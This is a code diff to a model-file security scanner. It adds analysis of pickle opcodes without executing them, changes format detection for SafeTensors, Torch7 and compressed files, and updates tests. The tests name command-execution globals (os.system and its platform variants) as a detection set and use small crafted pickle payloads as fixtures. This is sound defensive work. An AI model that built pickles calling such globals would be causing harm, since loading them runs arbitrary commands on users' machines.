+    if opcode.name in {"TUPLE1", "TUPLE2", "TUPLE3"}:
+        tuple_values = stack[-num_to_pop:]
+
+    if opcode.name == "APPEND":
+        preserved_value = stack[-2]
+        item = stack[-1]
+        container_kind = value_kind(preserved_value)
+        if container_kind == "any":
+            pass
+        elif container_kind == "bytearray":
+            if value_kind(item) not in {"any", "int_unknown"} and not (
+                isinstance(item, tuple) and item[0] == "int" and 0 <= item[1] <= 255
+            ):
+                return False
+            preserved_value[1] += 1
+        elif container_kind == "list":
+            preserved_value[1] += 1
+        else:
+            return False
+    elif opcode.name == "SETITEM":
+        preserved_value = stack[-3]
+        key = stack[-2]
+        value = stack[-1]
+        container_kind = value_kind(preserved_value)
+        if container_kind == "any":
+            pass
+        elif container_kind == "dict":
+            if not is_known_hashable(key):
+                return False
+        elif container_kind in {"list", "bytearray"}:
+            if value_kind(key) not in {"any", "int_unknown"} and (
+                not isinstance(key, tuple) or key[0] != "int" or not -preserved_value[1] <= key[1] < preserved_value[1]
+            ):
+                return False
+            if container_kind == "bytearray" and not (
+                value_kind(value) in {"any", "int_unknown"}
+                or (isinstance(value, tuple) and value[0] == "int" and 0 <= value[1] <= 255)
+            ):
+                return False
+        else:
+            return False
+
+    if opcode.name in {"PUT", "BINPUT", "LONG_BINPUT", "MEMOIZE"}:
+        if not stack or stack[-1] is pickletools.markobject:
+            return False
+        memo_index = len(memo) if opcode.name == "MEMOIZE" else argument
+        memo[memo_index] = stack[-1]
+        if opcode.name == "MEMOIZE":
+            after = [stack[-1]]
+    elif opcode.name in {"GET", "BINGET", "LONG_BINGET"}:
+        if argument not in memo:
+            return False
+        after = [memo[argument]]
+    elif opcode.name == "DUP":
+        after = [stack[-1], stack[-1]]
+
+    if preserved_value is not None:
+        after = [preserved_value]
+    elif len(after) == 1 and hasattr(after[0], "name") and after[0] is not pickletools.markobject:
+        output_kind = after[0].name
+        if opcode.name == "NEXT_BUFFER":
+            after = ["any"]
+        elif opcode.name == "READONLY_BUFFER":
+            input_kind = value_kind(stack[-1])
+            if input_kind in {"bytearray", "unhashable_buffer"}:
+                after = ["unhashable_buffer"]
+            elif input_kind == "any":
+                after = ["any"]
+            else:
+                after = ["buffer"]
+        elif output_kind in {"bytes_or_str", "str"} and argument in {b"", ""}:
+            after = ["empty_string"]
+        elif output_kind in {"int", "int_or_bool"}:
+            after = [
+                argument if argument == "int_unknown" else ("int", int(argument) if isinstance(argument, int) else 0)
+            ]
+        elif output_kind == "bool":
+            after = [("int", int(opcode.name == "NEWTRUE"))]
+        elif output_kind == "list":
+            after = [["list", slice_size if opcode.name == "LIST" else 0]]
+        elif output_kind == "bytearray":
+            if (
+                isinstance(argument, tuple)
+                and len(argument) == 2
+                and argument[0] == "bytearray_length"
+                and isinstance(argument[1], int)
+            ):
+                bytearray_length = argument[1]
+            else:
+                bytearray_length = len(argument) if isinstance(argument, bytearray | bytes) else 0
+            after = [["bytearray", bytearray_length]]
+        elif output_kind in {"dict", "set"}:
+            after = [[output_kind, None]]
+        elif output_kind == "tuple":
+            after = [("tuple", tuple(tuple_values))]
+        elif output_kind != "any":
+            after = [output_kind]
+
+    if num_to_pop:
+        del stack[-num_to_pop:]
+    stack.extend(after)
+    return True
+
+
+def _is_valid_pickle_global_argument(argument: Any) -> bool:
+    """Return whether a textual GLOBAL/INST operand has nonempty module and name lines."""
+    return (
+        isinstance(argument, tuple)
+        and len(argument) == 3
+        and argument[0] == "global_argument"
+        and isinstance(argument[1], str)
+        and isinstance(argument[2], str)
+        and bool(argument[1])
+        and bool(argument[2])
+    )
+
+
+def _classify_initial_pickle_security_signal(
+    sample: bytes,
+    *,
+    sample_is_prefix: bool,
+    available_stream_length: int | None = None,
+    _work_budget: _PickleProbeWorkBudget | None = None,
+    _sample_start: int = 0,
+    _frame_aware: bool | None = None,
+) -> bool | None:
+    """Classify bounded consecutive pickle streams without executing them."""
+    if _frame_aware is None:
+        if _work_budget is None:
+            _work_budget = _PickleProbeWorkBudget()
+        linear_state = _classify_initial_pickle_security_signal(
+            sample,
+            sample_is_prefix=sample_is_prefix,
+            available_stream_length=available_stream_length,
+            _work_budget=_work_budget,
+            _sample_start=_sample_start,
+            _frame_aware=False,
+        )
+        if linear_state is True:
+            return linear_state
+        if not _work_budget.saw_frame:
+            return linear_state
+        frame_state = _classify_initial_pickle_security_signal(
+            sample,
+            sample_is_prefix=sample_is_prefix,
+            available_stream_length=available_stream_length,
+            _work_budget=_work_budget,
+            _sample_start=_sample_start,
+            _frame_aware=True,
+        )
+        if frame_state is True:
+            return True
+        if linear_state is None or frame_state is None:
+            return None
         return False
 
-    return isinstance(parsed_header, dict)
+    if _work_budget is None:
+        _work_budget = _PickleProbeWorkBudget()
+    stream = _PickleProbeStream(sample, _sample_start, frame_aware=_frame_aware)
+    memo: dict[Any, Any] = {}
+    available_stream_end = None if available_stream_length is None else _sample_start + available_stream_length
+    saw_alternate_inconclusive = False
+    saw_opcode = False
+
+    def negative_result() -> bool | None:
+        return None if saw_alternate_inconclusive else False
+
+    def classify_frame_resumes() -> bool | None:
+        nonlocal saw_alternate_inconclusive
+        future_frame_ends = stream.frame_resume_positions()
+        if any(frame_end > len(sample) for frame_end in future_frame_ends):
+            return None if sample_is_prefix else False
+        for frame_end in future_frame_ends:
+            if frame_end < len(sample):
+                if _work_budget.remaining_frame_branches <= 0:
+                    saw_alternate_inconclusive = True
+                    continue
+                _work_budget.remaining_frame_branches -= 1
+                remaining_stream_length = (
+                    None if available_stream_end is None else max(0, available_stream_end - frame_end)
+                )
+                alternate_state = _classify_initial_pickle_security_signal(
+                    sample,
+                    sample_is_prefix=sample_is_prefix,
+                    available_stream_length=remaining_stream_length,
+                    _work_budget=_work_budget,
+                    _sample_start=frame_end,
+                    _frame_aware=_frame_aware,
+                )
+                if alternate_state is True:
+                    return True
+                if alternate_state is None:
+                    saw_alternate_inconclusive = True
+            elif sample_is_prefix:
+                saw_alternate_inconclusive = True
+        return None if saw_alternate_inconclusive else False
+
+    while stream.tell() < len(sample):
+        stream_start = stream.tell()
+        has_reachable_security_opcode = False
+        stack: list[Any] = []
+        try:
+            for opcode, argument, _position in _gen_pickle_probe_ops(stream):
+                if _work_budget.remaining_opcodes <= 0:
+                    return True if has_reachable_security_opcode else None
+                _work_budget.remaining_opcodes -= 1
+                saw_opcode = True
+                opcode_name = opcode.name
+                if opcode_name == "FRAME":
+                    _work_budget.saw_frame = True
+                invalid_opcode_argument = (
+                    opcode_name == "PROTO"
+                    and (not isinstance(argument, int) or argument > _MAX_FORWARD_COMPAT_BINARY_PICKLE_PROTOCOL)
+                ) or (
+                    opcode_name in {"PUT", "BINPUT", "LONG_BINPUT", "GET", "BINGET", "LONG_BINGET"}
+                    and (not isinstance(argument, int) or argument < 0)
+                )
+                invalid_opcode_argument = invalid_opcode_argument or (
+                    opcode_name in {"PUT", "BINPUT", "LONG_BINPUT"}
+                    and isinstance(argument, int)
+                    and argument > _PICKLE_MAX_STRUCTURAL_MEMO_INDEX
+                )
+                invalid_opcode_argument = invalid_opcode_argument or (
+                    opcode_name in {"EXT1", "EXT2", "EXT4"} and (not isinstance(argument, int) or argument <= 0)
+                )
+                invalid_opcode_argument = invalid_opcode_argument or (
+                    opcode_name in {"GLOBAL", "INST"} and not _is_valid_pickle_global_argument(argument)
+                )
+                if invalid_opcode_argument:
+                    return True if has_reachable_security_opcode else negative_result()
+                if not _apply_pickle_stack_effect(
+                    opcode,
+                    argument,
+                    stack,
+                    memo,
+                    _work_budget.hashability_cache,
+                ):
+                    if has_reachable_security_opcode:
+                        return True
+                    return negative_result()
+                if opcode_name in _BINARY_PICKLE_SECURITY_OPCODES:
+                    has_reachable_security_opcode = True
+                if opcode_name != "STOP":
+                    continue
+
+                if not _frame_aware:
+                    if has_reachable_security_opcode:
+                        return True
+                    break
+
+                if has_reachable_security_opcode:
+                    return True
+                if classify_frame_resumes() is True:
+                    return True
+                break
+        except _PickleNumericOperandLimitExceeded:
+            return True if has_reachable_security_opcode else None
+        except ValueError as exc:
+            exc_message = str(exc)
+            position_match = re.search(r"(?:at )?position (\d+)", exc_message)
+            if position_match is not None and "opcode" in exc_message:
+                return True if has_reachable_security_opcode else negative_result()
+            if has_reachable_security_opcode:
+                return True
+            if sample_is_prefix and sample[stream_start] in _PICKLE_OPCODE_BY_BYTE:
+                return None
+            return negative_result()
+        except (MemoryError, RecursionError):
+            return True if has_reachable_security_opcode else None
+        except Exception:
+            return True if has_reachable_security_opcode else None
+
+        if stream.tell() <= stream_start:
+            return True if has_reachable_security_opcode else None
+
+    if saw_alternate_inconclusive or (sample_is_prefix and saw_opcode):
+        return None
+    return False
+
+
+def _classify_extended_initial_line_pickle_security_signal(
+    path: Path,
+    file_size: int,
+    sample: bytes,
+) -> bool | None:
+    """Resolve an initial line operand without retaining attacker-sized data."""
+    opcode_offset = 0
+    protocol_prefix = b""
+    if _looks_like_binary_pickle_protocol(sample[:4]):
+        protocol_prefix = sample[:2]
+        opcode_offset = 2
+    if opcode_offset >= len(sample):
+        return None
+
+    opcode = _PICKLE_OPCODE_BY_BYTE.get(sample[opcode_offset])
+    if opcode is None or opcode.arg is None or opcode.arg.n != -1:
+        return None
+
+    canonical_opcode = {
+        "FLOAT": b"F0.0\n",
+        "GET": b"g0\n",
+        "GLOBAL": b"cbuiltins\nset\n",
+        "INST": b"i__builtin__\nset\n",
+        "INT": b"I0\n",
+        "LONG": b"L0\n",
+        "PERSID": b"Px\n",
+        "PUT": b"p0\n",
+        "STRING": b"S'x'\n",
+        "UNICODE": b"Vx\n",
+    }.get(opcode.name)
+    if canonical_opcode is None:
+        return None
+
+    try:
+        with path.open("rb") as handle:
+            argument_end, budget_exceeded, _ = _find_pickle_line_argument_end(
+                handle,
+                opcode_offset + 1,
+                file_size,
+                2 if opcode.name in _PICKLE_LINE_PAIR_OPCODES else 1,
+                min(file_size, SAFETENSORS_ROUTING_HEADER_PARSE_BYTES),
+            )
+            if budget_exceeded:
+                return None
+            if argument_end is None:
+                return False
+            cpython_numeric = False
+            if opcode.name in {"FLOAT", "GET", "INT", "LONG", "PUT"}:
+                handle.seek(opcode_offset + 1)
+                line = handle.read(argument_end - opcode_offset - 1)
+                canonical_line = _canonicalize_cpython_numeric_line(sample[opcode_offset], line)
+                if canonical_line is not None:
+                    canonical_opcode = sample[opcode_offset : opcode_offset + 1] + canonical_line
+                    cpython_numeric = True
+            if not cpython_numeric:
+                handle.seek(opcode_offset)
+                try:
+                    parsed_opcode, _, _ = next(pickletools.genops(handle))
+                except (StopIteration, UnicodeError, ValueError):
+                    return False
+                except (MemoryError, RecursionError):
+                    return None
+                if parsed_opcode.name != opcode.name or handle.tell() != argument_end:
+                    return False
+            handle.seek(argument_end)
+            suffix = handle.read(min(PROTO0_1_MAX_PROBE_BYTES, file_size - argument_end))
+    except _PickleNumericOperandLimitExceeded:
+        return None
+    except OSError:
+        return None
+
+    normalized_sample = protocol_prefix + canonical_opcode + suffix
+    return _classify_initial_pickle_security_signal(
+        normalized_sample,
+        sample_is_prefix=argument_end + len(suffix) < file_size,
+        available_stream_length=len(protocol_prefix) + len(canonical_opcode) + file_size - argument_end,
+    )
+
+
+def _detect_safetensors_content_route(path: Path | None, magic8: bytes, file_size: int) -> str | None:
+    """Resolve a validated SafeTensors frame that may also contain a pickle."""
+    validated_header = _validated_safetensors_routing_header(path, magic8, file_size)
+    if validated_header is None:
+        return None
+    if path is None:
+        return "safetensors"
+
+    header_len, header = validated_header
+    try:
+        if header is None:
+            with path.open("rb") as handle:
+                sample = handle.read(min(file_size, PROTO0_1_MAX_PROBE_BYTES))
+        else:
+            data_offset = 8 + header_len
+            tail_size = min(PROTO0_1_MAX_PROBE_BYTES, file_size - data_offset)
+            with path.open("rb") as handle:
+                handle.seek(data_offset)
+                sample = magic8 + header + handle.read(tail_size)
+    except OSError:
+        return PICKLE_ROUTING_INCONCLUSIVE_FORMAT
+
+    sample_is_prefix = len(sample) < file_size
+    pickle_state = _classify_initial_pickle_security_signal(
+        sample,
+        sample_is_prefix=sample_is_prefix,
+        available_stream_length=file_size,
+    )
+    if pickle_state is None and header is not None:
+        pickle_state = _classify_extended_initial_line_pickle_security_signal(path, file_size, sample)
+    if (
+        pickle_state is None
+        and header is not None
+        and len(sample) < min(file_size, SAFETENSORS_ROUTING_HEADER_PARSE_BYTES)
+    ):
+        data_offset = 8 + header_len
+        extended_tail_size = max(0, SAFETENSORS_ROUTING_HEADER_PARSE_BYTES - data_offset)
+        try:
+            with path.open("rb") as handle:
+                handle.seek(data_offset)
+                extended_sample = magic8 + header + handle.read(min(extended_tail_size, file_size - data_offset))
+        except OSError:
+            return PICKLE_ROUTING_INCONCLUSIVE_FORMAT
+        if len(extended_sample) > len(sample):
+            pickle_state = _classify_initial_pickle_security_signal(
+                extended_sample,
+                sample_is_prefix=len(extended_sample) < file_size,
+                available_stream_length=file_size,
+            )
+    if pickle_state is True:
+        return "pickle"
+
+    if header is None or (sample_is_prefix and pickle_state is None):
+        structural_state = _has_bounded_protocolless_binary_pickle_security_signal(path, file_size, sample)
+        if structural_state is True:
+            return "pickle"
+        if structural_state is None:
+            return PICKLE_ROUTING_INCONCLUSIVE_FORMAT
+        return "safetensors"
+
+    if pickle_state is None:
+        return PICKLE_ROUTING_INCONCLUSIVE_FORMAT
+    return "safetensors"
+
+
+def _resolve_safetensors_tensorflow_overlap(path: Path, file_size: int) -> str:
+    """Prefer fully validated SafeTensors framing over only ambiguous protobuf evidence."""
+    renamed_tensorflow_format = _detect_renamed_tensorflow_protobuf(
+        path,
+        file_size,
+        fail_closed_on_inconclusive=False,
+    )
+    if renamed_tensorflow_format == "oversized":
+        return "tf_metagraph"
+    if renamed_tensorflow_format in {"oversized_candidate", "inconclusive"}:
+        try:
+            magic8 = read_magic_bytes(str(path), 8)
+        except OSError:
+            return TENSORFLOW_PROTOBUF_ROUTING_INCONCLUSIVE_FORMAT
+        validated_header = _validated_safetensors_routing_header(path, magic8, file_size)
+        if validated_header is not None and validated_header[1] is not None:
+            return "safetensors"
+        return TENSORFLOW_PROTOBUF_ROUTING_INCONCLUSIVE_FORMAT
+    if renamed_tensorflow_format != "unknown":
+        return renamed_tensorflow_format
+    return "safetensors"
 
 
 def should_defer_safetensors_header_limit_hash(path: str, max_header_bytes: int) -> bool:
@@ -3346,6 +4555,40 @@ def find_structural_torch7_offset(payload: bytes) -> int | None:
     return min(offsets) if offsets else None
 
 
+def _has_structural_torch7_content_route(
+    file_path: Path | None,
+    file_size: int,
+    magic4: bytes,
+) -> bool:
+    """Return whether explicit Torch7 magic has supporting serialized structure."""
+    if magic4 != b"T7\x00\x00" or not _allows_renamed_binary_content_route(file_path):
+        return False
+    if file_path is None:
+        return True
+    try:
+        prefix = read_magic_bytes(str(file_path), min(file_size, _TORCH7_SIGNATURE_READ_BYTES))
+    except OSError:
+        return False
+    return find_structural_torch7_offset(prefix) is not None
+
+
+def has_structural_torch7_content_route(path: str) -> bool:
+    """Return whether a local overlap has explicit Torch7 structure near its magic."""
+    file_path = Path(path)
+    try:
+        file_size = file_path.stat().st_size
+        magic4 = read_magic_bytes(path, 4)
+    except OSError:
+        return False
+    if magic4 != b"T7\x00\x00":
+        return False
+    try:
+        prefix = read_magic_bytes(path, min(file_size, _TORCH7_SIGNATURE_READ_BYTES))
+    except OSError:
+        return False
+    return find_structural_torch7_offset(prefix) is not None
+
+
 def find_torch7_candidate_offset(payload: bytes) -> int | None:
     """Return the earliest Torch7 candidate with structure or nearby Lua risk signal."""
     binary_offset = _find_torch7_binary_candidate_offset(payload)
@@ -3492,6 +4735,193 @@ def _detect_compression_format(prefix: bytes) -> str | None:
     if is_zlib_header(prefix[:2]):
         return "zlib"
     return None
+
+
+def _has_structurally_valid_compression_header(prefix: bytes, compression_format: str) -> bool:
+    """Reject weak compression magic that cannot begin the claimed codec."""
+    if compression_format == "gzip":
+        return len(prefix) >= 4 and prefix[2] == 8 and prefix[3] & 0xE0 == 0
+    if compression_format == "bzip2":
+        return len(prefix) >= 4 and prefix[:3] == _BZIP2_MAGIC and prefix[3:4] in b"123456789"
+    if compression_format == "zlib":
+        return is_zlib_header(prefix[:2])
+    return compression_format in {"xz", "lz4"}
+
+
+def _could_start_structurally_valid_compression_header(prefix: bytes, compression_format: str) -> bool:
+    """Retain a partial same-codec header when a bounded probe ends mid-signature."""
+    if compression_format == "gzip":
+        required_prefix = b"\x1f\x8b\x08"
+        if len(prefix) < len(required_prefix):
+            return required_prefix.startswith(prefix)
+        return len(prefix) < 4 or _has_structurally_valid_compression_header(prefix, compression_format)
+    if compression_format == "bzip2":
+        required_prefix = _BZIP2_MAGIC
+        if len(prefix) < len(required_prefix):
+            return required_prefix.startswith(prefix)
+        return prefix.startswith(required_prefix) and (len(prefix) < 4 or prefix[3:4] in b"123456789")
+    if compression_format == "xz":
+        return _XZ_MAGIC.startswith(prefix) if len(prefix) < len(_XZ_MAGIC) else prefix.startswith(_XZ_MAGIC)
+    if compression_format == "lz4":
+        return (
+            _LZ4_FRAME_MAGIC.startswith(prefix)
+            if len(prefix) < len(_LZ4_FRAME_MAGIC)
+            else prefix.startswith(_LZ4_FRAME_MAGIC)
+        )
+    if compression_format == "zlib":
+        if len(prefix) >= 2:
+            return is_zlib_header(prefix[:2])
+        return bool(prefix) and any(is_zlib_header(prefix + bytes([second_byte])) for second_byte in range(256))
+    return False
+
+
+def _probe_compression_prefix(
+    path: Path,
+    file_size: int,
+    compression_format: str,
+    *,
+    probe_limit: int,
+) -> bool | Literal["complete_with_nonmember_trailing"] | None:
+    """Return False only when bounded decoding disproves a compression collision."""
+    if compression_format == "gzip":
+        decompressor: Any = zlib.decompressobj(16 + zlib.MAX_WBITS)
+        error_types: tuple[type[BaseException], ...] = (zlib.error,)
+    elif compression_format == "zlib":
+        decompressor = zlib.decompressobj()
+        error_types = (zlib.error,)
+    elif compression_format == "bzip2":
+        decompressor = bz2.BZ2Decompressor()
+        error_types = (OSError, EOFError)
+    elif compression_format == "xz":
+        decompressor = lzma.LZMADecompressor(memlimit=64 * 1024 * 1024)
+        error_types = (lzma.LZMAError, EOFError)
+    else:
+        return None
+
+    total_input = 0
+    total_output = 0
+    successfully_decoded_input = 0
+    input_limit = min(file_size, probe_limit)
+    output_limit = probe_limit
+    try:
+        with path.open("rb") as handle:
+            while total_input < input_limit:
+                chunk = handle.read(min(4096, input_limit - total_input))
+                if not chunk:
+                    break
+                total_input += len(chunk)
+                try:
+                    output = decompressor.decompress(chunk, max_length=output_limit - total_output + 1)
+                except error_types:
+                    return None if total_output > 0 or successfully_decoded_input > 32 else False
+                successfully_decoded_input = total_input
+                total_output += len(output)
+                if total_output > output_limit:
+                    return None
+                if getattr(decompressor, "eof", False):
+                    trailing = bytes(getattr(decompressor, "unused_data", b""))
+                    if compression_format == "gzip":
+                        trailing = trailing.lstrip(b"\x00")
+                        while not trailing and total_input < min(file_size, input_limit):
+                            padding_probe = handle.read(min(4096, input_limit - total_input))
+                            if not padding_probe:
+                                break
+                            total_input += len(padding_probe)
+                            trailing = padding_probe.lstrip(b"\x00")
+                        if not trailing:
+                            return True if total_input >= file_size else None
+                        if len(trailing) < 16 and total_input < min(file_size, input_limit):
+                            suffix_probe = handle.read(min(16 - len(trailing), input_limit - total_input))
+                            total_input += len(suffix_probe)
+                            trailing += suffix_probe
+                    elif not trailing and total_input < file_size:
+                        trailing = handle.read(min(16, file_size - total_input))
+                    if not trailing:
+                        return True
+                    trailing_format = _detect_compression_format(trailing)
+                    if trailing_format == compression_format and _has_structurally_valid_compression_header(
+                        trailing,
+                        compression_format,
+                    ):
+                        return None
+                    if total_input < file_size and _could_start_structurally_valid_compression_header(
+                        trailing,
+                        compression_format,
+                    ):
+                        return None
+                    return "complete_with_nonmember_trailing" if compression_format == "gzip" else False
+                if getattr(decompressor, "unconsumed_tail", b""):
+                    return None
+    except OSError:
+        return None
+    return None
+
+
+def _compression_route_precedes_safetensors(
+    path: Path | None,
+    prefix: bytes,
+    file_size: int,
+    compression_format: str,
+) -> bool:
+    """Retain plausible compression while yielding decoder-invalid length collisions."""
+    if path is None:
+        return True
+    validated_header = _validated_safetensors_routing_header(path, prefix[:8], file_size)
+    if validated_header is None:
+        return True
+    if not _has_structurally_valid_compression_header(prefix, compression_format):
+        return False
+    if compression_format == "zlib" and len(prefix) >= 2 and prefix[1] & 0x20:
+        return True
+    header_len, header = validated_header
+    if header is None:
+        probe_limit = PROTO0_1_MAX_PROBE_BYTES
+    else:
+        probe_limit = min(
+            file_size,
+            8 + header_len + PROTO0_1_MAX_PROBE_BYTES,
+            SAFETENSORS_ROUTING_HEADER_PARSE_BYTES + PROTO0_1_MAX_PROBE_BYTES,
+        )
+    probe_result = _probe_compression_prefix(
+        path,
+        file_size,
+        compression_format,
+        probe_limit=probe_limit,
+    )
+    return probe_result not in {False, "complete_with_nonmember_trailing"}
+
+
+def has_safetensors_gzip_nonmember_trailing_overlap(path: str) -> bool:
+    """Return whether bounded decoding proves a gzip member before SafeTensors-owned trailing data."""
+    file_path = Path(path)
+    try:
+        file_size = file_path.stat().st_size
+        prefix = read_magic_bytes(path, 16)
+    except OSError:
+        return False
+    if _detect_compression_format(prefix) != "gzip" or not _has_structurally_valid_compression_header(prefix, "gzip"):
+        return False
+    validated_header = _validated_safetensors_routing_header(file_path, prefix[:8], file_size)
+    if validated_header is None:
+        return False
+    header_len, header = validated_header
+    if header is None:
+        probe_limit = PROTO0_1_MAX_PROBE_BYTES
+    else:
+        probe_limit = min(
+            file_size,
+            8 + header_len + PROTO0_1_MAX_PROBE_BYTES,
+            SAFETENSORS_ROUTING_HEADER_PARSE_BYTES + PROTO0_1_MAX_PROBE_BYTES,
+        )
+    return (
+        _probe_compression_prefix(
+            file_path,
+            file_size,
+            "gzip",
+            probe_limit=probe_limit,
+        )
+        == "complete_with_nonmember_trailing"
+    )
 
 
 def _looks_like_renamed_r_serialized_header(prefix: bytes) -> bool:
@@ -4054,8 +5484,14 @@ def detect_format_from_magic_bytes(
 ) -> FileFormat:
     """Detect file format using Python 3.10+ pattern matching on magic bytes."""
     compression_format = _detect_compression_format(magic16)
-    if compression_format:
+    if compression_format and _compression_route_precedes_safetensors(
+        file_path,
+        magic16,
+        file_size,
+        compression_format,
+    ):
         return compression_format
+    structural_torch7_route = _has_structural_torch7_content_route(file_path, file_size, magic4)
 
     # Use pattern matching for cleaner magic byte detection
     match magic4:
@@ -4063,8 +5499,6 @@ def detect_format_from_magic_bytes(
             return "catboost"
         case b"RKNN" if _allows_renamed_binary_content_route(file_path):
             return "rknn"
-        case b"T7\x00\x00" if _allows_renamed_binary_content_route(file_path):
-            return "torch7"
         case b"GGUF":
             return "gguf"
         case magic if magic in GGML_MAGIC_VARIANTS:
@@ -4108,8 +5542,13 @@ def detect_format_from_magic_bytes(
             if onnx_route_status is True:
                 return "onnx"
 
-    if _is_safetensors_routing_candidate(file_path, magic8, file_size):
-        return "safetensors"
+    safetensors_route = _detect_safetensors_content_route(file_path, magic8, file_size)
+    if safetensors_route is not None:
+        if safetensors_route == "safetensors" and file_path is not None:
+            return _resolve_safetensors_tensorflow_overlap(file_path, file_size)
+        return safetensors_route
+    if structural_torch7_route:
+        return "torch7"
     if _looks_like_binary_pickle_protocol(magic4) and (
         file_path is None or not _could_be_content_routed_flax_msgpack(file_path)
     ):
@@ -4585,15 +6024,27 @@ def detect_file_format(path: str) -> str:
         return llamafile_format
 
     compression_format = _detect_compression_format(header)
+    compression_precedes_safetensors = compression_format is not None and _compression_route_precedes_safetensors(
+        file_path,
+        header,
+        size,
+        compression_format,
+    )
+    structural_torch7_route = _has_structural_torch7_content_route(file_path, size, magic4)
     has_known_container_magic = (
         _has_zip_magic(magic4)
         or magic8.startswith(_SEVENZIP_MAGIC)
         or _has_rar_magic(magic8)
         or _looks_like_uncompressed_tar_header(header)
     )
-    if compression_format is None and not has_known_container_magic:
-        if _is_safetensors_routing_candidate(file_path, magic8, size):
-            return "safetensors"
+    if not compression_precedes_safetensors and not has_known_container_magic:
+        safetensors_route = _detect_safetensors_content_route(file_path, magic8, size)
+        if safetensors_route is not None:
+            if safetensors_route == "safetensors":
+                return _resolve_safetensors_tensorflow_overlap(file_path, size)
+            return safetensors_route
+        if structural_torch7_route:
+            return "torch7"
         could_be_flax = _could_be_content_routed_flax_msgpack(file_path)
         if _looks_like_binary_pickle_protocol(magic4) and not could_be_flax:
             return "pickle"

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -4592,12 +4592,10 @@ def detect_file_format(path: str) -> str:
         or _looks_like_uncompressed_tar_header(header)
     )
     if compression_format is None and not has_known_container_magic:
+        if _is_safetensors_routing_candidate(file_path, magic8, size):
+            return "safetensors"
         could_be_flax = _could_be_content_routed_flax_msgpack(file_path)
-        if (
-            _looks_like_binary_pickle_protocol(magic4)
-            and not could_be_flax
-            and not _is_safetensors_routing_candidate(file_path, magic8, size)
-        ):
+        if _looks_like_binary_pickle_protocol(magic4) and not could_be_flax:
             return "pickle"
         pickle_probe_sample = _read_pickle_probe_sample(file_path, size, magic16)
         protocol_less_state = _has_bounded_protocolless_binary_pickle_security_signal(

--- a/modelaudit/utils/sources/cloud_storage.py
+++ b/modelaudit/utils/sources/cloud_storage.py
@@ -1591,6 +1591,7 @@ def _cloud_directory_cache_scope(
     if selective:
         payload.update(
             {
+                "routing_version": 2,
                 "extensions": (
                     None
                     if scannable_extensions is None

--- a/packages/modelaudit-picklescan/tests/test_api.py
+++ b/packages/modelaudit-picklescan/tests/test_api.py
@@ -88,6 +88,14 @@ EXPECTED_SYSTEM_GLOBAL = _expected_system_global()
 SYSTEM_GLOBALS = frozenset({"os.system", EXPECTED_SYSTEM_GLOBAL, "nt.system", "posix.system"})
 
 
+def _isolate_reusable_meta_path_finders(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.setattr(
+        sys,
+        "meta_path",
+        [finder for finder in sys.meta_path if ":unreusable:" not in _meta_path_finder_resolution_identity(finder)],
+    )
+
+
 @pytest.fixture(autouse=True)
 def _restore_copyreg_dispatch_table() -> collections.abc.Iterator[None]:
     original_dispatch_table = dict(copyreg.dispatch_table)
@@ -1568,6 +1576,7 @@ def test_scan_file_combines_pytorch_zip_private_source_fingerprints(
     other_path = source_root / f"{other_module}.py"
     other_path.write_text("def entrypoint():\n    return 2\n")
     monkeypatch.syspath_prepend(str(source_root))
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     archive_path = tmp_path / "model.pt"
     with zipfile.ZipFile(archive_path, "w") as archive:
@@ -5732,6 +5741,7 @@ def test_scan_bytes_preserves_origin_review_when_call_graph_enrichment_is_disabl
         encoding="utf-8",
     )
     monkeypatch.syspath_prepend(str(tmp_path))
+    _isolate_reusable_meta_path_finders(monkeypatch)
     payload = b"cnumpy\nGadget\n."
 
     report = scan_bytes(
@@ -5755,7 +5765,10 @@ def test_scan_bytes_preserves_origin_review_when_call_graph_enrichment_is_disabl
     assert marker.read_text(encoding="utf-8") == "owned"
 
 
-def test_scan_bytes_allows_trusted_origin_when_call_graph_enrichment_is_disabled() -> None:
+def test_scan_bytes_allows_trusted_origin_when_call_graph_enrichment_is_disabled(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    _isolate_reusable_meta_path_finders(monkeypatch)
     report = scan_bytes(
         b"ccollections\nOrderedDict\n.",
         source="disabled-enrichment-ordered-dict.pkl",
@@ -5898,6 +5911,8 @@ def test_scan_bytes_warns_when_framework_reconstruction_reference_resolves_to_sh
         encoding="utf-8",
     )
     monkeypatch.syspath_prepend(str(tmp_path))
+    monkeypatch.delitem(sys.modules, "torch._utils", raising=False)
+    monkeypatch.delitem(sys.modules, "torch", raising=False)
     _clear_source_sensitive_caches()
     payload = b"ctorch._utils\n_rebuild_tensor_v2\n."
 
@@ -6130,11 +6145,7 @@ def test_with_call_graph_findings_records_source_fingerprint_metadata(
     module_path = tmp_path / "safe_module.py"
     module_path.write_text("def safe():\n    return 1\n")
     monkeypatch.syspath_prepend(str(tmp_path))
-    monkeypatch.setattr(
-        sys,
-        "meta_path",
-        [finder for finder in sys.meta_path if ":unreusable:" not in _meta_path_finder_resolution_identity(finder)],
-    )
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     report = PickleReport(
         source="safe-module.pkl",
@@ -6169,6 +6180,7 @@ def test_with_call_graph_findings_fails_closed_for_loaded_source_outside_search_
     module = ModuleType("loaded_safe_module")
     module.__spec__ = ModuleSpec("loaded_safe_module", loader=None, origin=str(module_path))
     monkeypatch.setitem(sys.modules, "loaded_safe_module", module)
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     report = PickleReport(
         source="loaded-safe-module.pkl",
@@ -6207,6 +6219,7 @@ def test_with_call_graph_findings_fingerprints_parent_package_markers(
     (second_package / "child.py").write_text("def entrypoint():\n    return 1\n")
     monkeypatch.syspath_prepend(str(second_root))
     monkeypatch.syspath_prepend(str(first_root))
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     report = PickleReport(
         source="parent-package-marker.pkl",
@@ -6245,6 +6258,7 @@ def test_with_call_graph_findings_fingerprints_higher_priority_namespace_candida
     safe_module.write_text("def entrypoint():\n    return 1\n")
     monkeypatch.syspath_prepend(str(second_root))
     monkeypatch.syspath_prepend(str(first_root))
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     report = PickleReport(
         source="namespace-candidate.pkl",
@@ -6289,6 +6303,7 @@ def test_with_call_graph_findings_fingerprints_sourceless_parent_package_markers
     py_compile.compile(str(package_source), cfile=str(package_marker), doraise=True)
     monkeypatch.syspath_prepend(str(second_root))
     monkeypatch.syspath_prepend(str(first_root))
